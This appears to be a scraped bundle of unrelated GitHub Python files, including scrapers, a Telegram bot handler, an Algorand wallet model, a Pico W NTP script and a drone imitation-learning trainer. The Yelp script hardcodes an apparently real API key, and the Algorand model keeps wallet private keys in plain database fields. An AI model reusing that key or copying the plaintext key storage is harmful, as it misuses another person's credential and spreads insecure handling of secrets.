lst_asient_no_balanc:\n if item.totaldebe != item.totalhaber:\n rowPosition = self.obj_form.tb_asientos.rowCount()\n self.obj_form.tb_asientos.insertRow(rowPosition)\n self.obj_form.tb_asientos.setItem(rowPosition, 0, QTableWidgetItem(str(item.fecha)))\n self.obj_form.tb_asientos.setItem(rowPosition, 1, QTableWidgetItem(str(item.descripcion)))\n self.obj_form.tb_asientos.setItem(rowPosition, 2, QTableWidgetItem(str(item.totaldebe)))\n self.obj_form.tb_asientos.setItem(rowPosition, 3, QTableWidgetItem(str(item.totalhaber)))\n\n\n\n def buscar(self):\n # self.limpiar()\n if self.obj_form.lne_cuit.text() != \"\":\n cuit = self.obj_form.lne_cuit.text()\n obj_e_cliente = E_cliente()\n self.obj_cliente = obj_e_cliente.get_cliente_cuit_cuil(cuit)\n if self.obj_cliente == False:\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Atencion\")\n msgBox.setText('No se encontro el cliente')\n msgBox.exec_()\n else:\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Atencion\")\n msgBox.setText('Cliente OK')\n msgBox.exec_()\n self.obj_form.lne_razon_social.setText(self.obj_cliente.razon_social)\n obj_e_ejercicio = E_ejercicio()\n self.lista_ejercicio = obj_e_ejercicio.get_ejercicio_id_cliente(self.obj_cliente.id_cliente)\n for item in self.lista_ejercicio:\n self.obj_form.cbx_ejercicio.addItem(item.descripcion)\n\n\n elif self.obj_form.lne_razon_social.text() != \"\":\n razon_social = self.obj_form.lne_razon_social.text()\n obj_e_cliente = E_cliente()\n self.obj_cliente = obj_e_cliente.get_cliente_razon_social(razon_social)\n if self.obj_cliente == False:\n # \"cliente encontrado\"\n a = 1\n else:\n a = 2\n # ingrese el cuit nuevamente\n","repo_name":"lriccombene/sgc1","sub_path":"w_form_balancear_asiento.py","file_name":"w_form_balancear_asiento.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37670414233","text":"from Grid import Grid\nfrom Symbol import Symbol\n\n\nclass Match:\n # public Grid grid;\n # public boolean playersTurn;\n # public boolean gameIsOver;\n # public String winner;\n # public int numberOfMoves;\n # public Symbol playerSymbol;\n # public Symbol botSymbol;\n\n def __init__(self, player_symbol):\n self.grid = Grid()\n self.player_symbol = player_symbol\n self.bot_symbol = Symbol.O if self.player_symbol == Symbol.X else Symbol.X;\n self.players_turn = bool(True)\n self.game_is_over = bool(False)\n self.number_of_moves = 0\n self.winner = \"\"","repo_name":"free-da/TicTacToePython","sub_path":"Match.py","file_name":"Match.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31212671030","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport time\r\n\r\ndef scrape_product_details(url):\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}\r\n response = requests.get(url, headers=headers)\r\n\r\n if response.status_code == 200:\r\n soup = BeautifulSoup(response.content, \"html.parser\")\r\n try:\r\n description = soup.find(\"div\", {\"id\": \"productDescription\"}).text.strip()\r\n except AttributeError:\r\n description = \"Nil\"\r\n try:\r\n asin = soup.find(\"th\", string=\"ASIN\").find_next(\"td\").text.strip()\r\n except AttributeError:\r\n asin = \"Nil\"\r\n try:\r\n product_description = soup.find(\"h1\", {\"id\": \"title\"}).text.strip()\r\n except AttributeError:\r\n product_description = \"Nil\"\r\n try:\r\n manufacturer = soup.find(\"a\", {\"id\": \"bylineInfo\"}).text.strip()\r\n except AttributeError:\r\n manufacturer = \"Nil\"\r\n\r\n product_details = {\r\n \"Product URL\": url,\r\n \"Description\": description,\r\n \"ASIN\": asin,\r\n \"Product Description\": product_description,\r\n \"Manufacturer\": manufacturer\r\n }\r\n return product_details\r\n else:\r\n print(f\"Failed to fetch the page: {url}\")\r\n return None\r\n\r\ndef scrape_products(url):\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}\r\n response = requests.get(url, headers=headers)\r\n\r\n if response.status_code == 200:\r\n soup = BeautifulSoup(response.content, \"html.parser\")\r\n products = []\r\n\r\n # Find product containers on the page\r\n product_containers = soup.find_all(\"div\", {\"data-component-type\": \"s-search-result\"})\r\n\r\n for container in product_containers:\r\n try:\r\n product_url = \"https://www.amazon.in\" + container.find(\"a\", class_=\"a-link-normal\").get(\"href\")\r\n product_info = scrape_product_details(product_url)\r\n if product_info:\r\n products.append(product_info)\r\n except AttributeError:\r\n continue\r\n\r\n return products\r\n\r\n else:\r\n print(f\"Failed to fetch the page: {url}\")\r\n return None\r\n\r\nbase_url = \"https://www.amazon.in/s?k=bags&crid=2M096C61O4MLT&qid=1653308124&sprefix=ba%2Caps%2C283&ref=sr_pg_\"\r\ntotal_pages = 20\r\nall_products = []\r\n\r\nfor page in range(1, total_pages + 1):\r\n url = base_url + str(page)\r\n print(f\"Fetching URL: {url}\")\r\n products_on_page = scrape_products(url)\r\n if products_on_page:\r\n all_products.extend(products_on_page)\r\n # time.sleep(3) # Add a delay of 3 seconds between each page request\r\n\r\ndf = pd.DataFrame(all_products)\r\ndf.to_csv(r\"amazon_scrape_with_details.csv\", index=False)\r\n","repo_name":"NaeemNiyas/web_scraping","sub_path":"WebScraping_Part2.py","file_name":"WebScraping_Part2.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16951950847","text":"import logging,sys\n\n\n\nlogger = logging.getLogger()#获取logger对象\nformatter = logging.Formatter('%(asctime)s -%(levelname)-8s: %(message)s')#设置格式\nfile_handler = logging.FileHandler(\"test512.log\")\nfile_handler.setFormatter(formatter)#指定输出格式\n# 控制台日志\nconsole_handler = logging.StreamHandler(sys.stdout)\nconsole_handler.formatter = formatter # 也可以直接给formatter赋值\n# 为logger添加的日志处理器\nlogger.addHandler(file_handler)\nlogger.addHandler(console_handler)\n\n# 指定日志的最低输出级别,默认为WARN级别\nlogger.setLevel(logging.INFO)\n\n","repo_name":"birlyjer/mbkf","sub_path":"kongfei/resource/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32352109386","text":"from aiogram import types\nfrom dispatcher import dp\nfrom database import pg\nimport config as cfg\n\nimport lang\n\n@dp.message_handler(content_types=[\"new_chat_members\"], is_bot=True)\nasync def addBotToChat(message: types.Message):\n\tpg.createTables(message[\"from\"].id, message.chat.id, message.chat.title, message.message_id)\n\n\tchatLang = pg.getChatLang(message.chat.id)\n\tawait message.reply(getattr(lang, chatLang).firstMessageText)\n\n@dp.message_handler(content_types=[\"new_chat_members\"])\nasync def addUserToChat(message: types.Message):\n\tif not pg.existUser(message.from_user.id, message.chat.id):\n\t\tif message.from_user.username:\n\t\t\tpg.addUser(message.from_user.id, message.chat.id, message.from_user.username)\n\t\telse:\n\t\t\tpg.addUser(message.from_user.id, message.chat.id, message.from_user.first_name)","repo_name":"rvbsm/telegramchatbot","sub_path":"handlers/message_new_members_chat.py","file_name":"message_new_members_chat.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23481920384","text":"#!/usr/bin/python3\n\nimport os\n\nimport click\nimport sys\n\nimport src.utils.logger as logger\nfrom src.utils.opts_shared import CLI_CTX_SETTINGS\n\nSOURCE = 'src'\nSOURCE_FOLDER = os.path.join(os.path.dirname(__file__), SOURCE)\nCMD_FOLDERS = {os.path.abspath(os.path.join(SOURCE_FOLDER, k)): k for k in ['client', 'command', 'ddns', 'auth']}\n\n\ndef to_module(args: list):\n args.insert(0, SOURCE)\n return '.'.join(args)\n\n\nclass DynamicCLI(click.MultiCommand):\n commands = {}\n\n def __init__(self, **kwargs):\n super().__init__(no_args_is_help=True, **kwargs)\n for folder in CMD_FOLDERS.keys():\n for filename in os.listdir(folder):\n if filename.endswith('.py') and filename.startswith('cmd_'):\n self.commands[filename[4:-3]] = CMD_FOLDERS[folder]\n\n def list_commands(self, ctx):\n return sorted(self.commands.keys())\n\n def get_command(self, ctx, cmd_name):\n name = cmd_name.encode('ascii', 'replace') if sys.version_info[0] == 2 else cmd_name\n try:\n module = self.commands.get(name)\n if module is None:\n logger.error(f'Unsupported command \"{name}\"')\n click.echo(click.get_current_context().get_help())\n sys.exit(10)\n return __import__(to_module([module, 'cmd_' + name]), None, None, ['cli']).cli\n except ImportError as err:\n logger.error(\"Load command failed {}::{}\".format(name, str(err)))\n sys.exit(10)\n\n\n@click.command(cls=DynamicCLI, context_settings=CLI_CTX_SETTINGS)\ndef cli():\n \"\"\"VPN CLI tool\"\"\"\n pass\n\n\nif __name__ == '__main__':\n cli(auto_envvar_prefix='VPN')\n","repo_name":"play-iot/iot-vpn","sub_path":"cli/python/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"45079454254","text":"import socket\nimport struct\nimport time\n\nimport network\nimport ubinascii\nimport ujson\nfrom machine import Pin\n\nimport PicoW_WiFi\n\n\ndef set_time():\n ntp_query = bytearray( 48 )\n ntp_query[0] = 0x1B\n ntp_addr = socket.getaddrinfo( ntp_host, 123 )[0][-1]\n pico_socket = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )\n try:\n pico_socket.settimeout( 1 )\n pico_socket.sendto( ntp_query, ntp_addr )\n ntp_msg = pico_socket.recv( 48 )\n finally:\n pico_socket.close()\n unpacked_value = struct.unpack( \"!I\", ntp_msg[40:44] )[0]\n hrs_offset = -7\n epoch_time = unpacked_value + NTP_DELTA + hrs_offset * 3600\n # (tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec, tm_wday, tm_yday, tm_isdst)\n time_tuple = time.gmtime( epoch_time )\n machine.RTC().datetime( (time_tuple[0], time_tuple[1], time_tuple[2], time_tuple[6] + 1, time_tuple[3], time_tuple[4], time_tuple[5], 0) )\n\n\nif __name__ == \"__main__\":\n mac = ubinascii.hexlify( network.WLAN().config( 'mac' ), ':' ).decode()\n print( f\"MAC address: {mac}\" )\n\n # Load login data from a file for safety reasons.\n with open( 'privateInfo.json' ) as privateInfo:\n secrets = ujson.loads( privateInfo.read() )\n\n wifi_ssid = secrets['ssid']\n wifi_password = secrets['pass']\n broker = secrets['broker']\n client_id = secrets['client_id']\n publish_topic = secrets['pubTopic']\n\n NTP_DELTA = -2208988800\n ntp_host = \"pool.ntp.org\"\n led = Pin( \"LED\", Pin.OUT )\n\n PicoW_WiFi.wifi_connect( wifi_ssid, wifi_password )\n\n led.on()\n print( f\"Local time before: {time.localtime()}\" )\n set_time()\n print( f\"Local time after: {time.localtime()}\" )\n led.off()\n","repo_name":"AdamJHowell/PicoW_MicropythonCode","sub_path":"NTP_uPython.py","file_name":"NTP_uPython.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26995445131","text":"# _*_ coding : utf-8 _*_\n# @Time : 2022/10/8 19:06\n# @Author : 邓浩\n# @File : 1.正则解析\n# @Project : 爬虫\nimport re\n\nimport requests\nimport os\n# 创建一个文件夹 用来保存所有的图片\nif not os.path.exists('./图片'):\n os.makedirs('./图片')\nurl = 'https://image.baidu.com/search/acjson?tn=resultjson_com&logid=8485880135978382076&ipn=rj&ct=201326592&is=&fp=result&fr=ala&word=搞笑囧图&queryWord=搞笑囧图&cl=2&lm=-1&ie=utf-8&oe=utf-8&adpicid=&st=&z=&ic=&hd=&latest=©right=&s=&se=&tab=&width=&height=&face=&istype=&qc=&nc=&expermode=&nojc=&isAsync=&pn=30&rn=30&gsm=1e0000000000001e&1665230412309='\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.37'\n}\n# 使用通用爬虫对一整张页面进行爬取\nimg_json = requests.get(url=url,headers=headers).json()\ncount = 1\nfor imgUrlList in img_json['data']:\n # 拿json的列表\n # 遍历imgUrl\n imgData = requests.get(url=imgUrlList['thumbURL'],headers=headers).content\n count += 1\n name =str(count) + '.jpg'\n with open('./图片/' + name,'wb') as fp:\n fp.write(imgData)\n print(name,'下载成功')\n\n# 使用聚焦爬虫对页面中所有的进行解析和提取\n# ex = '<img src=\"(.*?)\" class=\"photo-result-image\"'\n# img_src_list = re.findall(ex,page_text,re.S)\n# print(img_src_list)\n","repo_name":"qq1051766345/spider-learn","sub_path":"第三章:数据解析/1.正则解析.py","file_name":"1.正则解析.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6951324310","text":"from . import test_interface, helpers\nfrom distil import database\nfrom datetime import timedelta\n\n\nclass TestDatabaseModule(test_interface.TestInterface):\n\n def test_get_from_db(self):\n \"\"\"Test to ensure the data in the database matches the data entered.\"\"\"\n num_resources = 32\n num_tenants = 5\n\n helpers.fill_db(self.session, num_tenants, num_resources, self.end)\n\n db = database.Database(self.session)\n\n for i in range(num_tenants):\n usage = db.usage(self.start, self.start + timedelta(days=60),\n \"tenant_id_\" + str(i))\n self.assertEqual(usage.count(), num_resources)\n","repo_name":"RaginBajin/Distil","sub_path":"tests/test_database_module.py","file_name":"test_database_module.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39286778745","text":"#%%\nimport requests\nimport json\nimport pandas as pd\n\nAPI_KEY = \"nWG-5cGFojivklrg_K31zuWWUv3jn5-ByjrGKacyFnVQ-gWHuBIWpYSEAvRiBT2KlKaIgqu_tRmhP5TZjrNahTAx_xRSPOrdV-Ko5SdayZbJTFVm3Srj5pUXxgmUYHYx\"\nHEADERS = {f'Authorization': f'Bearer {API_KEY}'}\nURL = 'https://api.yelp.com/v3/businesses/search'\n\n#%%\n\nheaders = HEADERS\nurl = URL\nbusiness_type = input(\"What kind of business are you looking for: \")\nbusiness_location = input(\"Where do you want to look: \")\n\nparams = {'term': f'{business_type}', 'location': f'{business_location}'}\nreq = requests.get(url, params=params, headers=headers)\nraw_data_dict = json.loads(req.text)\nbusiness_info_list = []\n\n# single threaded put all the business info dictionaries into a list\nfor business in raw_data_dict[\"businesses\"]:\n business_url = f\"https://api.yelp.com/v3/businesses/{business['id']}\"\n req = requests.get(business_url, headers=headers)\n dic = json.loads(req.text)\n\n business_info_list.append(dic)\n\n# save the individual json file so its easier to look at\n#with open('fist_business.json', 'w') as f:\n #json.dump(business_info_list[0],fp=f, indent=4)\n\n#print(business_info_list[0])\n\n#%%\n# put all our data into a pandas dataframe and export as a csv\nmeta3 = ['id','alias','name','image_url','is_claimed','is_closed','url','phone','display_phone','review_count','rating','location','coordinates','photos','hours']\nbusiness_df = pd.json_normalize(business_info_list, record_path=['categories'], meta=meta3, errors='ignore', record_prefix='categories_')\n\ncsv_name = input(\"What do you want to name your file: \")\nbusiness_df.to_csv(f\"./data/raw/{csv_name}.csv\", index=False)\n\n# %%\n\n\n","repo_name":"JigglyNoahPuff/Sapien_Leads_Automation","sub_path":"personal_folders/CraigT/Yelp/yelp_business_search.py","file_name":"yelp_business_search.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36433110925","text":"import logging\nimport qrcode\nimport qrcode.image.svg\nfrom django.db import models, transaction\nfrom algorand import utils\nfrom django.conf import settings\nfrom users.models import CustomUser\nfrom algorand.utils import wait_for_confirmation, prepare_transfer_algos, prepare_transfer_assets\nfrom django.core.files.base import ContentFile\n\nlogger = logging.getLogger(__name__)\n\n\ndef upload_qr_code(instance, filename):\n return f\"accounts/{instance.address}/{filename}\"\n\n\nclass Account(models.Model):\n NORMAL_ACCOUNT = 0\n MAIN_ACCOUNT = 1\n PROJECT_ACCOUNT = 2\n ACCOUNT_TYPES = (\n (NORMAL_ACCOUNT, \"Normal account\"),\n (MAIN_ACCOUNT, \"Main account\"),\n (PROJECT_ACCOUNT, \"Smart contract account\")\n )\n\n user = models.OneToOneField(\n 'users.CustomUser', on_delete=models.SET_NULL,\n null=True, blank=True)\n project = models.OneToOneField(\n 'projects.Project', on_delete=models.SET_NULL,\n null=True, blank=True)\n private_key = models.CharField(max_length=128, blank=True, null=True)\n address = models.CharField(max_length=58)\n type = models.PositiveSmallIntegerField(\n default=NORMAL_ACCOUNT, choices=ACCOUNT_TYPES)\n opted_in = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n qr_code = models.ImageField(\n null=True, blank=True, upload_to=upload_qr_code)\n\n def __str__(self):\n if self.user:\n return f\"User: {self.user.name}\"\n else:\n return f\"Project: {self.project}\"\n\n def save(self, *args, **kwargs):\n if self.pk is None:\n self.generate_qr_code()\n\n return super().save(*args, **kwargs)\n\n @staticmethod\n def get_main_account():\n return Account.objects.get(type=Account.MAIN_ACCOUNT)\n\n @staticmethod\n def generate(\n entity,\n account_type=NORMAL_ACCOUNT,\n initial_amount=settings.ALGO_OPT_IN_AMOUNT,\n sync=False\n ):\n with transaction.atomic():\n private_key, address = utils.generate_account()\n logger.debug(\"Generated algorand account for %s.\", entity)\n\n created_account = Account.objects.create(\n private_key=private_key,\n address=address,\n type=account_type,\n **{'user': entity} if account_type != Account.PROJECT_ACCOUNT else {'project': entity}\n )\n logger.debug(\"Created account for %s.\", entity)\n\n # ONLY FOR TEST PURPOSES!!\n if account_type == Account.NORMAL_ACCOUNT and entity.type == CustomUser.INVESTOR and (settings.TESTING or settings.AUTO_INV_FUELING == '1'):\n main_account = Account.get_main_account()\n chained = [\n prepare_transfer_algos(\n main_account,\n created_account,\n 0.1\n ),\n prepare_transfer_assets(\n main_account,\n created_account,\n 1.0\n )\n ]\n keys = [main_account.private_key, main_account.private_key]\n else:\n chained = []\n keys = []\n\n tx_ids = created_account.opt_in(\n chained, keys, initial_amount=initial_amount)\n if sync:\n for tx_id in tx_ids:\n wait_for_confirmation(tx_id)\n\n return created_account\n\n def opt_in(self, chain=[], keys=[], initial_amount=settings.ALGO_OPT_IN_AMOUNT):\n main_account = Account.get_main_account()\n logger.debug(\"Opt-In transaction for %s account.\", self.address)\n internal_chain = [\n prepare_transfer_algos(\n main_account,\n self,\n initial_amount\n ),\n prepare_transfer_assets(\n self,\n self,\n 0.0,\n )\n ]\n internal_chain.extend(chain)\n internal_keys = [\n main_account.private_key,\n self.private_key\n ]\n internal_keys.extend(keys)\n return utils.sign_send_atomic_trasfer(internal_keys, internal_chain)\n\n def generate_qr_code(self):\n img = qrcode.make(\n f\"algorand://{self.address}\",\n version=1,\n image_factory=qrcode.image.svg.SvgPathImage\n )\n cp = ContentFile(b'')\n img.save(cp)\n self.qr_code.save('qr_code.svg', cp, save=False)\n\n def usdc_balance(self):\n return utils.usdc_balance(self.address)\n","repo_name":"Gaiachain-Ltd/FLRChain-web","sub_path":"backend/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22437584310","text":"class Solution:\n def numSquares(self, n):\n dp = [0]\n while len(dp) <= n:\n dp.append(min(dp[-i ** 2] for i in range(1, int(len(dp) ** 0.5 + 1))) + 1)\n return dp[-1]\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.numSquares(6255))\n","repo_name":"MadSkittles/leetcode","sub_path":"279.py","file_name":"279.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42685870671","text":"import numpy as np\nimport csv\nfrom PIL import Image\nimport tensorflow as tf\nimport tensorlayer as tl\nfrom tensorlayer.layers import *\n\n\naction_list=[]\nimg_list=[]\n\nsaved_number_images = 89\ndefault_control_signal = 1496\nmax_control_signal = 2011\n\n\n###===== Load action(roll) input values\nfile = open('roll_record.csv', 'r', encoding='utf-8')\nsaved_file = csv.reader(file)\n\n\n###===== Stack normalized action input\naction_list = []\nfor line in saved_file:\n action = int(line[1])\n action = (action - default_control_signal) / max_control_signal # Normalize control signal 981~2011 to -1~1\n action_list.append(action)\n#print(action_list)\nfile.close() \n\n\n###===== Load images and reshape\nfor i in range(0,saved_number_images):\n input_img = Image.open(\"D:\\Imitation_Learning_Quadcopter\\saved_image\\image_%d.jpg\" % i)\n img_list.append(input_img)\n \ndef img_reshape(input_img):\n \"\"\" (3, 64, 64) --> (64, 64, 3) \"\"\"\n _img = np.transpose(input_img, (1, 2, 0))\n _img = np.flipud(_img)\n _img = np.resize(_img, (1, 64, 64, 3))\n return _img\n\n###===== Packing data\nnum_actions = 1 # Get roll input only now\nimages_all = np.zeros((0, 64, 64, 3)) # initialize images_all\nactions_all = np.zeros((0, num_actions)) # 0 = none\n#rewards_all = np.zeros((0,)) # Later planning to do reinforcement learning\nprint(\"#\"*50) \nprint('Packing data into arrays... ')\nfor img, act in zip(img_list, action_list): # Have loaded img_list => reshape => stacking\n images_all = np.concatenate([images_all, img_reshape(img)], axis=0) # packing at images_all\n actions_all = np.concatenate([actions_all, np.reshape(act, [1,num_actions])], axis=0) # packing action\n \n#images_all.shape\n#actions_all.shape \n\n###===== Save the expert's data\ntl.files.save_any_to_npy(save_dict={'im': images_all, 'act': actions_all}, name='_tmp.npy')\n\n# save every 10th expert's observation to train 나중에 10으로 바꿔\n# can check in teacher's folder\ntl.files.exists_or_mkdir('image/teacher', verbose=True)\nfor i in range(0, len(images_all), 1):\n tl.vis.save_image(images_all[i], 'image/teacher/im_%d.png' % i)\n \nimg_dim = [64, 64, 3]\nn_action = 1 # steer only (float, left and right 1 ~ -1)\nsteps = 1000 # maximum step for a game\nbatch_size = 32\nn_epoch = 100\n\n###===== Define model\nclass Agent(object):\n def __init__(self, name='model', sess=None):\n assert sess != None\n self.name = name\n self.sess = sess\n\n self.x = tf.placeholder(tf.float32, [None, 64, 64, 3], name='Observaion')\n self.y = tf.placeholder(tf.float32, [None, 1], name='Steer')\n\n self._build_net(True, False)\n self._build_net(False, True)\n self._define_train_ops()\n\n tl.layers.initialize_global_variables(self.sess)\n\n print()\n self.n_test.print_layers()\n print()\n self.n_test.print_params(False)\n print()\n # exit()\n\n def _build_net(self, is_train=True, reuse=None):\n with tf.variable_scope(self.name, reuse=reuse) as vs:\n tl.layers.set_name_reuse(reuse)\n\n n = InputLayer(self.x / 255, name='in')\n\n n = Conv2d(n, 32, (3, 3), (1, 1), tf.nn.relu, \"VALID\", name='c1/1')\n n = Conv2d(n, 32, (3, 3), (1, 1), tf.nn.relu, \"VALID\", name='c1/2')\n n = MaxPool2d(n, (2, 2), (2, 2), 'VALID', name='max1')\n\n n = DropoutLayer(n, 0.75, is_fix=True, is_train=is_train, name='drop1')\n\n n = Conv2d(n, 64, (3, 3), (1, 1), tf.nn.relu, \"VALID\", name='c2/1')\n n = Conv2d(n, 64, (3, 3), (1, 1), tf.nn.relu, \"VALID\", name='c2/2')\n n = MaxPool2d(n, (2, 2), (2, 2), 'VALID', name='max2')\n # print(n.outputs)\n n = DropoutLayer(n, 0.75, is_fix=True, is_train=is_train, name='drop2')\n\n n = FlattenLayer(n, name='f')\n n = DenseLayer(n, 512, tf.nn.relu, name='dense1')\n n = DropoutLayer(n, 0.5, is_fix=True, is_train=is_train, name='drop3')\n n = DenseLayer(n, 1, tf.nn.tanh, name='o')\n\n if is_train:\n self.n_train = n\n else:\n self.n_test = n\n\n def _define_train_ops(self):\n self.cost = tl.cost.mean_squared_error(self.n_train.outputs, self.y, is_mean=False)\n self.train_params = tl.layers.get_variables_with_name(self.name, train_only=True, printable=False)\n self.train_op = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(self.cost, var_list=self.train_params)\n\n def train(self, X, y, n_epoch=100, batch_size=10, print_freq=20):\n for epoch in range(n_epoch):\n start_time = time.time()\n total_err, n_iter = 0, 0\n for X_, y_ in tl.iterate.minibatches(X, y, batch_size, shuffle=True):\n _, err = self.sess.run([self.train_op, self.cost], feed_dict={self.x: X_, self.y: y_})\n total_err += err\n n_iter += 1\n if epoch % print_freq == 0:\n print(\"Epoch [%d/%d] cost:%f took:%fs\" % (epoch, n_epoch, total_err/n_iter, time.time()-start_time))\n\n def predict(self, image):\n a = self.sess.run(self.n_test.outputs, {self.x : image})\n return a\n\n def save_model(self):\n tl.files.save_npz(self.n_test.all_params, name=self.name+'.npz', sess=self.sess)\n\n def load_model(self):\n tl.files.load_and_assign_npz(sess=self.sess, name=self.name+'.npz', network=self.n_test)\n\n \n###====== Pretrain model using data for demonstration\nif __name__ == \"__main__\":\n sess = tf.InteractiveSession()\n model = Agent(name='model', sess=sess)\n model.train(images_all, actions_all, n_epoch=n_epoch, batch_size=batch_size)\n # save model after pretraining\n model.save_model()\n output_file = open('results.txt', 'w')\n #for i in range(0, 89): ## When want to see and modify action values\n # output_file.write(str(actions_all[i]))\n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"droneRL2020/Imitation_Learning_Quadcopter","sub_path":"imitation_learning_training.py","file_name":"imitation_learning_training.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"599992209","text":"'''\nCreated on 17/08/2010\n\n@author: matheus\n'''\n#Importacoes\nimport pygtk\nfrom ImageManager import ImageManager\nimport Image\npygtk.require('2.0')\nimport gtk.glade\n\n#Classe que gerencia a interface\nclass Gui():\n\n\n #Construtor da classe\n def __init__(self):\n \n \n #Nome do arquivo Glade\n self.__glade_file = \"../xml/principal.glade\"\n gui = gtk.glade.XML(self.__glade_file)\n self.gui = gui\n \n self.main_window = gui.get_widget(\"janela_principal\")\n self.main_window.connect(\"destroy\", gtk.main_quit)\n \n \n #Associa os controles\n \n #Controles do menu\n self.btSair = gui.get_widget(\"sair_menuitem\")\n self.btSobre = gui.get_widget(\"sobre_menuitem\")\n \n \n #Controles da aba ESCALA DE CINZA\n self.fcEscalaOrigem = gui.get_widget(\"escala_filechooserbutton_origem\")\n self.fcEscalaDestino = gui.get_widget(\"escala_filechooserbutton_destino\")\n self.btEscalaExecutar = gui.get_widget(\"escala_button_executar\")\n self.btEscalaSalvar = gui.get_widget(\"escala_button_salvar\")\n \n \n #Controles da aba HISTOGRAMA\n self.fcHistogramaOrigem = gui.get_widget(\"hist_filechooserbutton_origem\")\n self.btHistogramaExecutar = gui.get_widget(\"hist_button_executar\")\n \n \n #Controles da aba LIMIARIZACAO\n self.fcLimiarizacaoOrigem = gui.get_widget(\"lim_filechooserbutton_origem\")\n self.fcLimiarizacaoDestino = gui.get_widget(\"lim_filechooserbutton_destino\")\n self.btLimiarizacaoSalvar = gui.get_widget(\"lim_button_salvar\")\n self.rbLimiarizacaoGlobal = gui.get_widget(\"lim_radiobutton_global\")\n self.rbLimiarizacaoVariaveis = gui.get_widget(\"lim_radiobutton_variaveis\")\n self.evLimiarizacao = gui.get_widget(\"lim_eventos\")\n self.hsLimiarizacao = gui.get_widget(\"lim_hscale\")\n self.txtLimiarizacaoR = gui.get_widget(\"lim_txt_r\")\n self.txtLimiarizacaoG = gui.get_widget(\"lim_txt_g\")\n self.txtLimiarizacaoB = gui.get_widget(\"lim_txt_b\")\n \n \n #Controles da aba OPERACOES ARITMETICAS\n self.fcOpAritmeticaOrigem1 = gui.get_widget(\"op_arit_filechooserbutton1\")\n self.fcOpAritmeticaOrigem2 = gui.get_widget(\"op_arit_filechooserbutton2\")\n self.fcOpAritmeticaDestino = gui.get_widget(\"op_arit_filechooserbutton_destino\")\n self.btOpAritmeticaExecutar = gui.get_widget(\"op_arit_button_executar\")\n self.btOpAritmeticaSalvar = gui.get_widget(\"op_arit_button_salvar\")\n self.rbOpAritmeticaAdicao = gui.get_widget(\"op_arit_radiobutton_adicao\")\n self.rbOpAritmeticaSubtracao = gui.get_widget(\"op_arit_radiobutton_subtracao\")\n self.rbOpAritmeticaMultiplicacao = gui.get_widget(\"op_arit_radiobutton_multiplicacao\")\n \n \n #Controles da aba OPERACOES LOGICAS\n self.fcOpLogicaOrigem1 = gui.get_widget(\"op_log_filechooserbutton1\")\n self.fcOpLogicaOrigem2 = gui.get_widget(\"op_log_filechooserbutton2\")\n self.fcOpLogicaDestino = gui.get_widget(\"op_log_filechooserbutton_destino\")\n self.btOpLogicaExecutar = gui.get_widget(\"op_log_button_executar\")\n self.btOpLogicaSalvar = gui.get_widget(\"op_log_button_salvar\")\n self.rbOpLogicaAnd = gui.get_widget(\"op_log_radiobutton_and\")\n self.rbOpLogicaOr = gui.get_widget(\"op_log_radiobutton_or\")\n self.rbOpLogicaXor = gui.get_widget(\"op_log_radiobutton_xor\")\n \n \n #Controles da aba FILTROS DINAMICOS\n self.fcFiltroDinOrigem = gui.get_widget(\"filtro_din_filechooserbutton_origem\")\n self.fcFiltroDinDestino = gui.get_widget(\"filtro_din_filechooserbutton_destino\")\n self.rbFiltroDinPassaAlta = 